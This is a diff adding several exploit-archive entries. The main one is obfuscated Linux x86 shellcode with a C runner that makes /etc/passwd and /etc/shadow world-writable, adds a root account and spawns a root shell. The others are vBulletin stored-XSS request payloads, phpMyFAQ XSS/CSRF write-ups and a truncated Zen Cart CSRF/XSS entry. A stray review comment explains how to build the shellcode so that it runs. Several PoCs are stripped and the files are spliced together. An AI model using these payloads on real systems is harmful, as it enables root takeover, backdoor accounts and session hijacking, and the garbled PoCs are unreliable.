@@ -0,0 +1,209 @@ +/* +#Title: Obfuscated Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh +#length: 521 bytes +#Date: 8 September 2018 +#Author: Ali Razmjoo +#tested On: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ] + + + +Ali Razmjoo , Ali.Razmjoo1994@Gmail.Com +Thanks to Jonathan Salwan + + +chmod('/etc/passwd',777) +chmod('/etc/shadow',777) +open passwd , and write new root user with passwrd ( user: ALI pass: ALI ) , close passwd +setreuid() , execve('/bin/sh') + + +root@g3n3rall:~/Desktop/xpl# objdump -d f.o + +f.o: file format elf32-i386 + + +Disassembly of section .text: + +00000000 <_start>: + 0: 31 c0 xor %eax,%eax + 2: 31 db xor %ebx,%ebx + 4: 31 c9 xor %ecx,%ecx + 6: 31 d2 xor %edx,%edx + 8: bb 59 45 4f 53 mov $0x534f4559,%ebx + d: ba 33 36 38 37 mov $0x37383633,%edx + 12: 31 d3 xor %edx,%ebx + 14: 53 push %ebx + 15: c1 eb 08 shr $0x8,%ebx + 18: 53 push %ebx + 19: bb 7a 46 59 45 mov $0x4559467a,%ebx + 1e: ba 55 36 38 36 mov $0x36383655,%edx + 23: 31 d3 xor %edx,%ebx + 25: 53 push %ebx + 26: bb 67 58 45 4e mov $0x4e455867,%ebx + 2b: ba 48 3d 31 2d mov $0x2d313d48,%edx + 30: 31 d3 xor %edx,%ebx + 32: 53 push %ebx + 33: 89 e3 mov %esp,%ebx + 35: 68 41 41 ff 01 push $0x1ff4141 + 3a: 59 pop %ecx + 3b: c1 e9 08 shr $0x8,%ecx + 3e: c1 e9 08 shr $0x8,%ecx + 41: 6a 0f push $0xf + 43: 58 pop %eax + 44: cd 80 int $0x80 + 46: bb 53 49 57 4a mov $0x4a574953,%ebx + 4b: ba 39 2d 38 3d mov $0x3d382d39,%edx + 50: 31 d3 xor %edx,%ebx + 52: c1 eb 08 shr $0x8,%ebx + 55: 53 push %ebx + 56: bb 6d 47 45 58 mov $0x5845476d,%ebx + 5b: ba 42 34 2d 39 mov $0x392d3442,%edx + 60: 31 d3 xor %edx,%ebx + 62: 53 push %ebx + 63: bb 6e 54 49 57 mov $0x5749546e,%ebx + 68: ba 41 31 3d 34 mov $0x343d3141,%edx + 6d: 31 d3 xor %edx,%ebx + 6f: 53 push %ebx + 70: 89 e3 mov %esp,%ebx + 72: 68 41 41 ff 01 push $0x1ff4141 + 77: 59 pop %ecx + 78: c1 e9 08 shr 
$0x8,%ecx + 7b: c1 e9 08 shr $0x8,%ecx + 7e: 6a 0f push $0xf + 80: 58 pop %eax + 81: cd 80 int $0x80 + 83: bb 73 47 4e 51 mov $0x514e4773,%ebx + 88: ba 32 34 39 35 mov $0x35393432,%edx + 8d: 31 d3 xor %edx,%ebx + 8f: c1 eb 08 shr $0x8,%ebx + 92: 53 push %ebx + 93: bb 59 44 56 44 mov $0x44564459,%ebx + 98: ba 76 34 37 37 mov $0x37373476,%edx + 9d: 31 d3 xor %edx,%ebx + 9f: 53 push %ebx + a0: bb 4e 58 59 51 mov $0x5159584e,%ebx + a5: ba 61 3d 2d 32 mov $0x322d3d61,%edx + aa: 31 d3 xor %edx,%ebx + ac: 53 push %ebx + ad: 89 e3 mov %esp,%ebx + af: 68 41 41 01 04 push $0x4014141 + b4: 59 pop %ecx + b5: c1 e9 08 shr $0x8,%ecx + b8: c1 e9 08 shr $0x8,%ecx + bb: 6a 05 push $0x5 + bd: 58 pop %eax + be: cd 80 int $0x80 + c0: 89 c3 mov %eax,%ebx + c2: 6a 04 push $0x4 + c4: 58 pop %eax + c5: 68 41 73 68 0a push $0xa687341 + ca: 59 pop %ecx + cb: c1 e9 08 shr $0x8,%ecx + ce: 51 push %ecx + cf: b9 57 67 57 58 mov $0x58576757,%ecx + d4: ba 39 48 35 39 mov $0x39354839,%edx + d9: 31 d1 xor %edx,%ecx + db: 51 push %ecx + dc: b9 4e 64 5a 51 mov $0x515a644e,%ecx + e1: ba 74 4b 38 38 mov $0x38384b74,%edx + e6: 31 d1 xor %edx,%ecx + e8: 51 push %ecx + e9: b9 47 57 56 42 mov $0x42565747,%ecx + ee: ba 35 38 39 36 mov $0x36393835,%edx + f3: 31 d1 xor %edx,%ecx + f5: 51 push %ecx + f6: b9 61 70 51 4e mov $0x4e517061,%ecx + fb: ba 2d 39 6b 61 mov $0x616b392d,%edx + 100: 31 d1 xor %edx,%ecx + 102: 51 push %ecx + 103: b9 48 58 70 74 mov $0x74705848,%ecx + 108: ba 72 68 4a 35 mov $0x354a6872,%edx + 10d: 31 d1 xor %edx,%ecx + 10f: 51 push %ecx + 110: b9 76 45 56 46 mov $0x46564576,%ecx + 115: ba 3d 6b 6c 76 mov $0x766c6b3d,%edx + 11a: 31 d1 xor %edx,%ecx + 11c: 51 push %ecx + 11d: 68 66 77 55 57 push $0x57557766 + 122: 68 68 70 31 50 push $0x50317068 + 127: 68 7a 59 65 41 push $0x4165597a + 12c: 68 41 61 41 51 push $0x51416141 + 131: 68 49 38 75 74 push $0x74753849 + 136: 68 50 4d 59 68 push $0x68594d50 + 13b: 68 54 42 74 7a push $0x7a744254 + 140: 68 51 2f 38 54 push $0x54382f51 + 145: 68 45 36 
6d 67 push $0x676d3645 + 14a: 68 76 50 2e 73 push $0x732e5076 + 14f: 68 4e 58 52 37 push $0x3752584e + 154: 68 39 4b 55 48 push $0x48554b39 + 159: 68 72 2f 59 42 push $0x42592f72 + 15e: 68 56 78 4b 47 push $0x474b7856 + 163: 68 39 55 66 5a push $0x5a665539 + 168: 68 46 56 6a 68 push $0x686a5646 + 16d: 68 46 63 38 79 push $0x79386346 + 172: 68 70 59 6a 71 push $0x716a5970 + 177: 68 77 69 53 68 push $0x68536977 + 17c: 68 6e 54 67 54 push $0x5467546e + 181: 68 58 4d 69 37 push $0x37694d58 + 186: 68 2f 41 6e 24 push $0x246e412f + 18b: 68 70 55 6e 4d push $0x4d6e5570 + 190: 68 24 36 24 6a push $0x6a243624 + 195: b9 73 61 74 67 mov $0x67746173,%ecx + 19a: ba 32 2d 3d 5d mov $0x5d3d2d32,%edx + 19f: 31 d1 xor %edx,%ecx + 1a1: 51 push %ecx + 1a2: 89 e1 mov %esp,%ecx + 1a4: ba 41 41 41 7f mov $0x7f414141,%edx + 1a9: c1 ea 08 shr $0x8,%edx + 1ac: c1 ea 08 shr $0x8,%edx + 1af: c1 ea 08 shr $0x8,%edx + 1b2: cd 80 int $0x80 + 1b4: 31 c0 xor %eax,%eax + 1b6: b0 46 mov $0x46,%al + 1b8: 31 db xor %ebx,%ebx + 1ba: 31 c9 xor %ecx,%ecx + 1bc: cd 80 int $0x80 + 1be: 31 c0 xor %eax,%eax + 1c0: b0 46 mov $0x46,%al + 1c2: 31 db xor %ebx,%ebx + 1c4: 31 c9 xor %ecx,%ecx + 1c6: cd 80 int $0x80 + 1c8: 68 52 55 48 42 push $0x42485552 + 1cd: 68 52 51 49 43 push $0x43495152 + 1d2: b9 49 4b 59 77 mov $0x77594b49,%ecx + 1d7: ba 66 38 31 35 mov $0x35313866,%edx + 1dc: 31 d1 xor %edx,%ecx + 1de: 51 push %ecx + 1df: b9 55 55 54 57 mov $0x57545555,%ecx + 1e4: ba 7a 37 3d 39 mov $0x393d377a,%edx + 1e9: 31 d1 xor %edx,%ecx + 1eb: 51 push %ecx + 1ec: 89 e3 mov %esp,%ebx + 1ee: 31 c0 xor %eax,%eax + 1f0: 88 43 07 mov %al,0x7(%ebx) + 1f3: 89 5b 08 mov %ebx,0x8(%ebx) + 1f6: 89 43 0c mov %eax,0xc(%ebx) + 1f9: b0 0b mov $0xb,%al + 1fb: 8d 4b 08 lea 0x8(%ebx),%ecx + 1fe: 8d 53 0c lea 0xc(%ebx),%edx + 201: cd 80 int $0x80 + 203: b0 01 mov $0x1,%al + 205: b3 01 mov $0x1,%bl + 207: cd 80 int $0x80 +root@g3n3rall:~/Desktop/xpl# + + + +*/ + +#include +#include +char sc[] = 
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xbb\x59\x45\x4f\x53\xba\x33\x36\x38\x37\x31\xd3\x53\xc1\xeb\x08\x53\xbb\x7a\x46\x59\x45\xba\x55\x36\x38\x36\x31\xd3\x53\xbb\x67\x58\x45\x4e\xba\x48\x3d\x31\x2d\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x53\x49\x57\x4a\xba\x39\x2d\x38\x3d\x31\xd3\xc1\xeb\x08\x53\xbb\x6d\x47\x45\x58\xba\x42\x34\x2d\x39\x31\xd3\x53\xbb\x6e\x54\x49\x57\xba\x41\x31\x3d\x34\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x73\x47\x4e\x51\xba\x32\x34\x39\x35\x31\xd3\xc1\xeb\x08\x53\xbb\x59\x44\x56\x44\xba\x76\x34\x37\x37\x31\xd3\x53\xbb\x4e\x58\x59\x51\xba\x61\x3d\x2d\x32\x31\xd3\x53\x89\xe3\x68\x41\x41\x01\x04\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x05\x58\xcd\x80\x89\xc3\x6a\x04\x58\x68\x41\x73\x68\x0a\x59\xc1\xe9\x08\x51\xb9\x57\x67\x57\x58\xba\x39\x48\x35\x39\x31\xd1\x51\xb9\x4e\x64\x5a\x51\xba\x74\x4b\x38\x38\x31\xd1\x51\xb9\x47\x57\x56\x42\xba\x35\x38\x39\x36\x31\xd1\x51\xb9\x61\x70\x51\x4e\xba\x2d\x39\x6b\x61\x31\xd1\x51\xb9\x48\x58\x70\x74\xba\x72\x68\x4a\x35\x31\xd1\x51\xb9\x76\x45\x56\x46\xba\x3d\x6b\x6c\x76\x31\xd1\x51\x68\x66\x77\x55\x57\x68\x68\x70\x31\x50\x68\x7a\x59\x65\x41\x68\x41\x61\x41\x51\x68\x49\x38\x75\x74\x68\x50\x4d\x59\x68\x68\x54\x42\x74\x7a\x68\x51\x2f\x38\x54\x68\x45\x36\x6d\x67\x68\x76\x50\x2e\x73\x68\x4e\x58\x52\x37\x68\x39\x4b\x55\x48\x68\x72\x2f\x59\x42\x68\x56\x78\x4b\x47\x68\x39\x55\x66\x5a\x68\x46\x56\x6a\x68\x68\x46\x63\x38\x79\x68\x70\x59\x6a\x71\x68\x77\x69\x53\x68\x68\x6e\x54\x67\x54\x68\x58\x4d\x69\x37\x68\x2f\x41\x6e\x24\x68\x70\x55\x6e\x4d\x68\x24\x36\x24\x6a\xb9\x73\x61\x74\x67\xba\x32\x2d\x3d\x5d\x31\xd1\x51\x89\xe1\xba\x41\x41\x41\x7f\xc1\xea\x08\xc1\xea\x08\xc1\xea\x08\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x68\x52\x55\x48\x42\x68\x52\x51\x49\x43\xb9\x49\x4b\x59\x77\xba\x66\x38\x31\x35\x31\xd1\x51\xb9\x55\x55\x54\x57\xba\x7a\x37\x3d\x39\x31\xd1\x51\x89\xe3\x31\xc0\x88\x43\x07\x8
9\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xb0\x01\xb3\x01\xcd\x80"; +int main(void) +{ + + fprintf(stdout,"Length: %d\n\n",strlen(sc)); + + (*(void(*)()) sc)(); + +} \ No newline at end of file diff --git a/platforms/php/webapps/34579.txt b/platforms/php/webapps/34579.txt new file mode 100755 index 000000000..6c0784076 --- /dev/null +++ b/platforms/php/webapps/34579.txt 
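Review bot: The harness in `main` calls the shellcode through `(*(void(*)()) sc)()`, i.e. executes from the writable `.data` segment, which faults on any toolchain that links a non-executable data segment by default; the header should state the required build, e.g. `gcc -m32 -z execstack -fno-stack-protector 34592.c`, or `main` should `mprotect()` the page to `PROT_READ|PROT_WRITE|PROT_EXEC` before the call. The two `#include` lines at the top of the listing have lost their header names (presumably `<stdio.h>` and `<string.h>`, needed for `fprintf` and `strlen`), so the file as shown does not compile. The header date (`8 September 2018`) disagrees with the index entry's 2014-09-09 and the stated test platform, so one of them is a typo.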
@@ -0,0 +1,118 @@
+#Title: vBulletin 5.1.X - Cross Site Scripting
+#Date: 05.09.14
+#Version: => 5.1.2 (Latest ATM)
+#Vendor: vbulletin.com
+#Contact: smash [at] devilteam.pl
+
+
+ 1) Agenda
+
+Latest vBulletin forum software suffers on persistent cross site scripting vulnerability, which most likely can be used against every user, such as administrator. Vulnerability is located at user profile page and will be executed whenever someone will visit it.
+
+Solution - proper filtration of image title value, in this case, it's about POST title_13 parameter.
+
+
+ 2) Vulnerability
+
+First step to reproduce the vulnerability, is to create a user account. By then, you should visit profile of the victim.
+
+Let's take as example following address:
+http://vbulletin/member/2-victim
+
+1. Click 'Share photo' (camera icon), pick any image you like.
+
+2. You may add comment about photo, all you need to do is to add js payload.
+
+As comment, use something like - huh" onmouseover=alert(666) xss="
+
+Request:
+POST /ajax/render/editor_gallery_photoblock HTTP/1.1
+Host: vbulletin
+
+photocount=1&photos%5B0%5D%5Bfiledataid%5D=13&photos%5B0%5D%5Btitle%5D=cool%22+onmouseover%3Dalert(666)+xssed%3D%22&securitytoken=[TOKEN]
+
+3. Send image by clicking on 'Post' button.
+
+Request:
+POST /create-content/gallery HTTP/1.1
+Host: vbulletin
+Content-Type: multipart/form-data;
+boundary=---------------------------18897880557155952661558219659
+Content-Length: 1558
+
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="securitytoken"
+
+1409922799-a28bf50b7ee16f6bfc2b7c652946c366e25574d5
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="text"
+
+
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="files"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="uploadFrom"
+
+
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="file"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="filedataid[]"
+
+13
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="title_13"
+
+cool" onmouseover=alert(666) xssed="
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="uploadFrom"
+
+
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="securitytoken"
+
+[TOKEN]
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="parentid"
+
+8
+-----------------------------18897880557155952661558219659
+Content-Disposition: form-data; name="setfor"
+
+5
+-----------------------------18897880557155952661558219659--
+
+4. Done
+
+At this point, victim should be noticed about new activity via 'Messages' tab:
+"attacker has left you a visitor message"
+
+Basically, you may use this XSS against any profile.
+
+Now, whenever someone will visit profile of victim (ie.
http://vbulletin/member/2-victim), he should notice image you uploaded. In this case, js is executed while 'onmouseover', so victim need to click on image.
+
+When victim will click on image, js will be executed, and popup will appear.
+
+Request:
+GET /filedata/gallery?nodeid=31&startIndex=0&securitytoken=[TOKEN] HTTP/1.1
+Host: vbulletin
+
+Response:
+HTTP/1.1 200 OK
+Content-Type: application/json; charset=UTF-8
+
+{"photos":[{"title":"cool\" onmouseover=alert(666) xssed=\"","url":"http:\/\/vbulletin\/filedata\/fetch?photoid=33","thumb":"vbulletin\/filedata\/fetch?photoid=33&thumb=1","links":"Photos By victim.victim@tlen.pl<\/a> in No Title<\/a>
 \n"}]}
+
+
+ 3) TL;DR
+
+ - Visit victim profile
+ - Upload any image
+ - XSS in title (asdf" onmouseover=alert(666) xss=")
+ - Send
\ No newline at end of file
diff --git a/platforms/php/webapps/34580.txt b/platforms/php/webapps/34580.txt
new file mode 100755
index 000000000..0288e233b
--- /dev/null
+++ b/platforms/php/webapps/34580.txt
@@ -0,0 +1,207 @@
+#Title: phpMyFAQ 2.8.X - Multiple Vulnerabilities
+#Vendor: phpmyfaq.de
+#Date: 04.09.19
+#Version: >= 2.8.12 (Latest ATM)
+#Tested on: Apache 2.2 / PHP 5.4 / Linux
+#Contact: smash [at] devilteam.pl
+
+
+1) Persistent XSS
+
+Administrator is able to view information about specific user session in 'Statistic' tab. Over there, you may find informations such as user ip, refferer and user agent.
+
+For example, to view informations about session with ID 1, you need visit following address:
+http://localhost/phpmyfaq/admin/?action=viewsession&id=1
+
+Refferer and User Agent variables are not filtered, which allows attacker to inject javascript via those parameters. All you need to do, is to perform particular HTTP request which will contain javascript. For example, if you will produce hundrends of those request, there will be hundrends of Persistent XSS - Victim only needs to visit any of them.
+
+PoC:
+
+alert(666)');
+curl_setopt($ch, CURLOPT_REFERER, '');
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
+$postResult = curl_exec($ch);
+curl_close($ch);
+print "$postResult";
+
+?>
+
+Vuln (viewsession):
+
+
+
+2014-09-04 02:22:04
+new_session (0)
+
+
+Referer:
+
+
+
+
+
+
+Browser:
+
+
+
+IP-Address:
+::1
+
+
+
+
+
+2) Remote FAQ Disclosure
+
+Administrator is able to view or download FAQ data using few extensions (xhtml, xml, pdf). Because of no user restrictions, attacker may reproduce this vulnerability to perform those actions even without having an account.
+
+ - Download
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ - View
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+3) CSRF
+
+ - Edit user credentials (login/mail)
+
+PoC:
+
+
+
+
+
+
+
+
+
+
+
+
+By then, you may generate new password for victim using 'Forgot password' option - just provide your email so you can grab it.
+
+
+ - Delete user
+
+http://localhost/phpmyfaq/admin/index.php?action=ajax&ajax=user&ajaxaction=delete_user&user_id=1
+
+
+ - Delete category
+
+http://localhost/phpmyfaq/admin/?action=deletecategory&cat=1&catlang=en
+
+
+ - Delete session (month)
+
+PoC:
+
+
+
+
+
+
+
+
+
+
+ - Delete logs older than 30 days
+
+http://localhost/phpmyfaq/admin/?action=deleteadminlog
+
+
+ - Add stopword
+
+http://localhost/phpmyfaq/admin/index.php?action=ajax&ajax=config&ajaxaction=save_stop_word&stopword=lolwut&stopwords_lang=en
+
+
+ - Edit configuration
+
+Affected:
+Main configuration
+FAQ records configuration
+Search
+Security configuration
+Spam control center
+Social network configuration
+
+PoC:
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/34581.txt b/platforms/php/webapps/34581.txt
new file mode 100755
index 000000000..1b9f647a2
--- /dev/null
+++ b/platforms/php/webapps/34581.txt
@@ -0,0 +1,712 @@
+#Title: Zen Cart 1.5.3 - CSRF & Admin Panel XSS
+#Date: 09.07.14
+#Vendor: zen-cart.com
+#Tested on: Apache 2.2 [at] Linux
+#Contact: smash[at]devilteam.pl
+
+#1 - CSRF
+
+- Delete admin
+
+GET profile stands for user id.
+
+localhost/zen/zen-cart-v1.5.3-07042014/admin123/profiles.php?action=delete&profile=2
+
+- Reset layout boxes to default
+
+localhost/zen/zen-cart-v1.5.3-07042014/admin123/layout_controller.php?page=&cID=74&action=reset_defaults
+
+
+#2 - Persistent XSS in admin panel
+
+Since admin privileges are required to execute following vulnerablities this is not a serious threat.
+
+- Extras -> Media types -> Add
+
+Vulnerable parameters - type_name & type_exit
+
+Request:
+POST /zen/zen-cart-v1.5.3-07042014/admin123/media_types.php?page=1&mID=2&action=save HTTP/1.1
+Host: localhost
+Content-Type: multipart/form-data; boundary=---------------------------4978676881674017321390852339
+Content-Length: 663
+
+-----------------------------4978676881674017321390852339
+Content-Disposition: form-data; name="securityToken"
+
+b98019227f8014aed6d22b02f0748d11
+-----------------------------4978676881674017321390852339
+Content-Disposition: form-data; name="type_name"
+
+

sup